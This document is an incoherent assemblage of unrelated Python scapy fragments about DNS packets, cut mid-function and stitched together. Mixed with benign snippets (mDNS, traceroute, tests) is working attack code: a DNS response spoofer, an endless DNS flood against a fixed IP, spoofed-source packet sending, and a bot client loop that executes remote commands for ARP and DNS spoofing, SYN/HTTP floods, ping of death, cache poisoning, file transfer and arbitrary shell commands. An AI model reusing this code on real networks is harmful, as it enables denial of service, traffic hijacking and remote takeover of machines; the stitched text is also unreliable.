def dnspunch(self):
# punchpkt
e = scapy.Ether(dst=self.router_mac)
self.msg("sending punchies...")
pkt = scapy.IP(src=self.server_ip, dst=self.attacker_ip)
pkt /= scapy.UDP(sport=53, dport=53)
pkt /= scapy.Raw("udp holepunch test")
scapy.sendp(e / pkt, iface=self.interface)
# rqpkt
self.msg("sending DNS request to %s asking %s..." %
(self.server_ip, self.domain))
pkt = scapy.IP(src=self.attacker_ip, dst=self.server_ip)
pkt /= scapy.UDP(sport=53, dport=53)
pkt /= scapy.DNS(rd=1, qd=scapy.DNSQR(qname=self.domain))
x, u = scapy.srp(e / pkt, timeout=5, iface=self.interface)
self.msg('ok')
for p in x[0]:
p.show()
if p[1].proto == 1:
print "%s %s/%s" % (p[1].sprintf("%IP.src%"),
p[1].sprintf("%ICMP.type%"),
p[1].sprintf("%ICMP.code%"))
else:
p[1].show()
def generate(self, ip_dst=None, eth_dst=None):
"""Generates a mDNS v4 packet for multicast DNS config
Args:
ip_dst: IP destination address (Optional)
eth_dst: Ethernet (layer 2) destination address (Optional)
"""
# Overwrite standard fields if desired
sta_ip = (ip_dst if ip_dst is not None else MDNS_V4_IP_DST)
sta_hw = (eth_dst if eth_dst is not None else MDNS_V4_MAC_DST)
# Create mDNS layer
qdServer = scapy.DNSQR(qname=self.src_ipv4, qtype=MDNS_QTYPE)
mDNS = scapy.DNS(rd=MDNS_RECURSIVE, qd=qdServer)
# Create UDP
udp = scapy.UDP(sport=MDNS_UDP_PORT, dport=MDNS_UDP_PORT)
# Create IP layer
ip4 = scapy.IP(src=self.src_ipv4, dst=sta_ip, ttl=255)
# Create Ethernet layer
ethernet = scapy.Ether(src=self.src_mac, dst=sta_hw)
self.packet = ethernet / ip4 / udp / mDNS
return self.packet
def dns_request_factory(id_num):
packet = network.DNS(id=random.randrange(0, 65536, 1),
rd=1,
qdcount=1,
qd=network.DNSQR(qname=str(id_num) +
".yumi.ipl.eecs.case.edu"))
return bytes(packet)
def make_response(transaction_id:str, question_name:bytes, size=3, cname=False) -> network.DNS:
if question_name == b"yumi.ipl.eecs.case.edu.":
return network.DNS(
id=transaction_id,
qr=1,
aa=1,
ra=1,
qdcount=1,
qd=network.DNSQR(qname=question_name),
ancount=1,
an=network.DNSRR(
rrname=question_name,
rdata="129.22.150.112"
)
)
if cname:
return network.DNS(
id=transaction_id,
qr=1,
aa=1,
ra=1,
qdcount=1,
qd=network.DNSQR(qname=question_name),
ancount=1,
an=network.DNSRR(
rrname=question_name,
type=5, #CNAME
rdata="cname-"+question_name.decode()
)
)
records = ["192.168.0.{}".format(num) for num in range(size)]
base_record = network.DNSRR(rrname=question_name, ttl=600, rdata=records[0])
for resource_records in records[1:]:
base_record /= network.DNSRR(rrname=question_name, ttl=600, rdata=resource_records)
return network.DNS(
id=transaction_id,
qr=1,
aa=1,
ra=1,
qdcount=1,
qd=network.DNSQR(qname=question_name),
ancount=len(records),
an=base_record
)
def setUp(self):
"""
Setup class for DNS_Amplification.
"""
# Create scapy packet (valid attack)
self.pkt = scapy.IP(src="10.0.2.15",
dst="dns.google") \
/ scapy.UDP(dport=53) \
/ scapy.DNS(rd=1, qd=scapy.DNSQR(qname="google.com", qtype="ANY"))
# Create a scapy packet (invalid attack)
self.pkt2 = scapy.IP(src="10.0.2.15",
dst="0.0.0.0") \
/ scapy.UDP(dport=53) \
/ scapy.DNS(rd=1, qd=scapy.DNSQR(qname="google.com", qtype="ANY"))
# Create DNS Amplification object
self.dns_amp_obj = DNS_Amplification()
def traceroute_dns_servers(hosts, fqdn):
"""
Run UDP traceroutes to the given DNS servers, using FQDN in DNS requests.
"""
log.info("Running UDP traceroutes to %d servers." % len(hosts))
addrs = [host.addr for host in hosts]
udp_datagram = scapy.UDP(sport=scapy.RandShort())
dns_msg = scapy.DNS(qd=scapy.DNSQR(qname=fqdn))
return scapy.traceroute(addrs, l4=udp_datagram / dns_msg, verbose=0)
def handle(packet): global hostfile_dict # Only deal with packets containing DNS records if packet.haslayer(scapy.DNS): # Dissect packet into approriate layers orig_ip = packet.getlayer(scapy.IP) orig_udp = packet.getlayer(scapy.UDP) orig_dns = packet.getlayer(scapy.DNS) # If -h option provided if hostfile_dict: # Check if queried domain part of hostfile if (packet.getlayer(scapy.DNS).qd.qname) not in hostfile_dict.keys(): return spoofed_rdata = hostfile_dict[orig_dns.qd.qname] else: # Spoofed IP of local machine ni.ifaddresses(dev) spoofed_rdata = ni.ifaddresses(dev)[ni.AF_INET][0]['addr'] #qr = 0 for Query and qtype = 1 for A record if orig_dns.qr == 0 and orig_dns.qd.qtype == 1: spoofed_src_ip = orig_ip.dst spoofed_dst_ip = orig_ip.src spoofed_src_port = orig_udp.dport spoofed_dst_port = orig_udp.sport spoofed_id = orig_dns.id spoofed_qr = 1 spoofed_opcode = orig_dns.opcode spoofed_aa = 1 spoofed_rd = orig_dns.rd spoofed_ra = 0 spoofed_z = 0 spoofed_rcode = 0 spoofed_qdcount = 1 spoofed_ancount = 1 spoofed_question = scapy.DNSQR(qname = orig_dns.qd.qname, qtype = orig_dns.qd.qtype, qclass = orig_dns.qd.qclass) spoofed_answer = scapy.DNSRR(rrname = orig_dns.qd.qname, type = orig_dns.qd.qtype, rclass = orig_dns.qd.qclass, ttl = 40960, rdata = spoofed_rdata) # To return multiple IPs #/scapy.DNSRR(rrname = orig_dns.qd.qname, type = orig_dns.qd.qtype, rclass = orig_dns.qd.qclass, ttl = 40960, rdata = spoofed_rdata) spoofed_IP = scapy.IP(src = spoofed_src_ip, dst = spoofed_dst_ip) spoofed_UDP = scapy.UDP(sport = spoofed_src_port, dport = spoofed_dst_port) spoofed_DNS = scapy.DNS(id = spoofed_id, qr = 1, opcode = spoofed_opcode, aa = 1, rd = spoofed_rd, ra = 0, z = 0, rcode = 0, qdcount = spoofed_qdcount, ancount = spoofed_ancount, qd = spoofed_question, an = spoofed_answer) # Sendp sends from layer 2 scapy.sendp(scapy.Ether()/spoofed_IP/spoofed_UDP/spoofed_DNS, iface = dev )
def DNS_Flood():
clear = os.system('clear')
#s = scapy.RandString(scapy.RandNum(1,10))
#s1 ='www'
#print(s1)
#a = scapy.RandNum(1,10)
#print(a)
#s2 = scapy.RandString(scapy.RandNum(1,5))
#s2 = s2.lower()
#s2 = str(s2)
#s2 = s2[2:-1]
#print(s2)
#process_id =process_id
#s3 = 'com'
#s = s1+'.'+s2+'.'+s3
#print("Please input target's IP:")
#target = input("[DNS_Flood]#")
#target = "172.16.4.80"
#src_ip = scapy.RandIP()
#print(s)
num = 0
try:
while True:
packet = scapy.IP(dst="172.16.4.80") / scapy.UDP(
sport=scapy.RandShort(), dport=53) / scapy.DNS(
rd=1, qd=scapy.DNSQR(qname="www.flood.com"))
#packets = scapy.IP(src=src_ip,dst=target)/scapy.UDP(sport=scapy.RandShort(),dport=53)/scapy.DNS(rd=1,qd=scapy.DNSQR(qname="www.flood.com"))
#packet =scapy.IP(src=src_ip,dst=target)/scapy.TCP(dport=80,flags="S")
#scapy.srflood(packet)
scapy.send(packet, count=2000, verbose=False)
#scapy.send(packets,verbose=False)
num += 1
#if num == 1000:
#print("%s,%s"%(name,num))
print(num)
except KeyboardInterrupt:
print("[-] Ctrl + C detected.....")
IPV4_PING = "\x08\x00\x00\x00\x0a\xce\x00\x03"
IPV6_PING = "\x80\x00\x00\x00\x0a\xce\x00\x03"
IPV4_ADDR = "8.8.8.8"
IPV6_ADDR = "2001:4860:4860::8888"
IPV6_SEQ_DGRAM_HEADER = (" sl "
"local_address "
"remote_address "
"st tx_queue rx_queue tr tm->when retrnsmt"
" uid timeout inode ref pointer drops\n")
# Arbitrary packet payload.
UDP_PAYLOAD = str(scapy.DNS(rd=1,
id=random.randint(0, 65535),
qd=scapy.DNSQR(qname="wWW.GoOGle.CoM",
qtype="AAAA")))
# Unix group to use if we want to open sockets as non-root.
AID_INET = 3003
def LinuxVersion():
# Example: "3.4.67-00753-gb7a556f".
# Get the part before the dash.
version = os.uname()[2].split("-")[0]
# Convert it into a tuple such as (3, 4, 67). That allows comparing versions
# using < and >, since tuples are compared lexicographically.
version = tuple(int(i) for i in version.split("."))
return version
def pkt(self):
return scapy.IP(dst=self.dst) / scapy.UDP(
sport=self.sport) / scapy.DNS(rd=1,
qd=scapy.DNSQR(qname=self.qname))
def make_DNS_request(ip_address: str) -> network.DNS:
request_id = hex(ip_2_int(ip_address))
question_name = "jumbo-" + request_id + QUESTION_ZONE
return network.DNS(rd=1, qdcount=1, qd=network.DNSQR(qname=question_name))
def run(self):
while True:
while not self.connected.value:
self.reconnect()
while True:
try:
command = self.reliable_receive()
if command[0] == "arpspoof":
try:
kill_arp()
except:
pass
try:
scan_result = network_scanner()
if scan_result:
global selected
global arp_process
selected = scan_result
arp_process = multiprocessing.Process(
target=arp_spoof,
args=(selected, router_ip))
arp_process.start()
except:
pass
elif command[0] == 'dnsspoof':
try:
kill_dns()
except:
pass
try:
if arp_process and arp_process.is_alive():
try:
kill_hook()
except:
pass
target_website = command[1]
modified_ip = command[2]
global dns_process
dns_process = multiprocessing.Process(
target=dns_spoof,
args=(target_website, modified_ip))
dns_process.start()
except:
pass
elif command[0] == 'hook':
try:
kill_hook()
except:
pass
try:
if arp_process and arp_process.is_alive():
try:
kill_dns()
except:
pass
global hook_process
hook_process = multiprocessing.Process(
target=hook)
hook_process.start()
except NameError:
pass
elif command[0] == "synflood":
try:
flood_ip = command[1]
flood_ports = list(
map(
int, command[2].translate(
{ord(i): None
for i in '[]'}).split(',')))
flood_time = int(command[3])
pool = multiprocessing.Pool(
processes=len(flood_ports))
pool.map(
partial(syn_flooding,
flood_ip=flood_ip,
flood_time=flood_time), flood_ports)
pool.close()
pool.join()
except:
pass
elif command[0] == "httpflood":
try:
flood_ip = command[1]
flood_time = int(command[2])
http_flooding(flood_ip, flood_time)
except:
pass
elif command[0] == "pod":
try:
flood_ip = command[1]
flood_time = int(command[2])
ping_of_death(flood_ip, flood_time)
except:
pass
elif command[0] == "dnscachepoison":
try:
spoofDomain = command[1]
ns = command[2]
nsAddr = command[3]
dnsAddr = command[4]
query = command[5]
dnsPorts = list(
map(
int, command[6].translate(
{ord(i): None
for i in '[]'}).split(',')))
start = int(command[7])
end = int(command[8])
if end > 65535:
end = 65535
dnsQids = list(range(start, end + 1))
badAddr = "10.0.2.10"
ip = scapy.IP(src=nsAddr, dst=dnsAddr)
qdsec = scapy.DNSQR(qname=query,
qtype="A",
qclass="IN")
ansec = scapy.DNSRR(rrname=ns,
type="A",
rclass="IN",
ttl=60000,
rdata=badAddr)
nssec = scapy.DNSRR(rrname=spoofDomain,
type="NS",
rclass="IN",
ttl=60000,
rdata=ns)
p_processes = []
manager = multiprocessing.Manager()
total_responses = manager.list()
for port in dnsPorts:
p = multiprocessing.Process(
target=fake_dns_responses,
args=(port, dnsQids, qdsec, ansec, nssec,
ip, total_responses))
p.start()
p_processes.append(p)
for process in p_processes:
process.join()
rawsock = socket.socket(socket.AF_INET,
socket.SOCK_RAW,
socket.IPPROTO_RAW)
rawsock.setsockopt(socket.IPPROTO_IP,
socket.SO_REUSEADDR, 1)
ip = scapy.IP(src=randomize_ip(), dst=dnsAddr)
qdsec = scapy.DNSQR(qname=query,
qtype="A",
qclass="IN")
dns = scapy.DNS(id=randomize_integer(),
qr=0,
opcode="QUERY",
rd=1,
qdcount=1,
ancount=0,
nscount=0,
arcount=0,
qd=qdsec)
sending_requests = multiprocessing.Process(
target=send_dns_requests,
args=(dnsPorts, ip, dns, dnsAddr, rawsock))
sending_fake_responses_processes = []
for port_responses in total_responses:
port = port_responses[0]
p = multiprocessing.Process(
target=send_dns_responses_pool,
args=(port, port_responses[1], dnsAddr,
rawsock))
sending_fake_responses_processes.append(p)
sending_requests.start()
for process in sending_fake_responses_processes:
process.start()
sending_requests.join()
for process in sending_fake_responses_processes:
process.join()
except:
pass
elif command[0] == "killarp":
try:
kill_arp()
except:
pass
elif command[0] == "killdns":
try:
kill_dns()
except:
pass
elif command[0] == "killhook":
try:
kill_hook()
except:
pass
else:
try:
if command[0] == "exit":
pass
elif command[0] == "killconnection":
self.connected.value = False
break
elif command[0] == "PING":
command_result = "PONG"
elif command[0] == "cd" and len(command) > 1:
command_result = change_working_directory_to(
command[1])
elif command[0] == "download":
command_result = read_file(command[1])
elif command[0] == "upload":
command_result = write_file(
command[1], command[2])
else:
command_result = execute_system_command(
command)
except:
command_result = "[-] Error during command execution."
self.reliable_send(command_result)
except OSError:
self.connected.value = False
break
elif command == 'requestdns':
my_ip = '10.0.2.10'
my_domain = input("Insert domain name: ")
my_port = 5533
dns_ip = input("Insert IP: ")
sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
sock.bind((my_ip, my_port))
rawsock = socket.socket(socket.AF_INET, socket.SOCK_RAW,
socket.IPPROTO_RAW)
rawsock.setsockopt(socket.IPPROTO_IP, socket.SO_REUSEADDR, 1)
ip = scapy.IP(src=my_ip, dst=dns_ip)
qdsec = scapy.DNSQR(qname=my_domain, qtype="A", qclass="IN")
dns = scapy.DNS(qr=0,
opcode="QUERY",
rd=1,
qdcount=1,
ancount=0,
nscount=0,
arcount=0,
qd=qdsec)
p = multiprocessing.Pool(8)
print("Sending requests...")
open_dns_ports = p.map(scan_dns, list(range(1, 65535 + 1)))
p.close()
p.join()
open_dns_ports = [port for port in open_dns_ports if port is not None]
import argparse
import scapy.all as scapy
parser = argparse.ArgumentParser(description='MIE-SIB second homework. Use Scapy to send a TCP/SYN packet with a spoofed sender IP address and a DNS query with a spoofed sender IP address. The scrit only work\'s in a class C network (/24)')
parser.add_argument('target', help='The IP address of the target')
parser.add_argument('dns_server', help='The IP address of the DNS server')
args = parser.parse_args()
#Send UDP packet
scapy.send(scapy.IP(src=args.target, dst=args.dns_server)/scapy.UDP(dport=53)/scapy.DNS(rd=1,qd=scapy.DNSQR(qname="www.thepacketgeek.com")),verbose=0)
#Send TCP packet
scapy.send(scapy.IP(src=scapy.Rand(args.target +"/24"), dst=args.target)/scapy.TCP(dport=3333, sport=4444, seq=12, flags="S"))
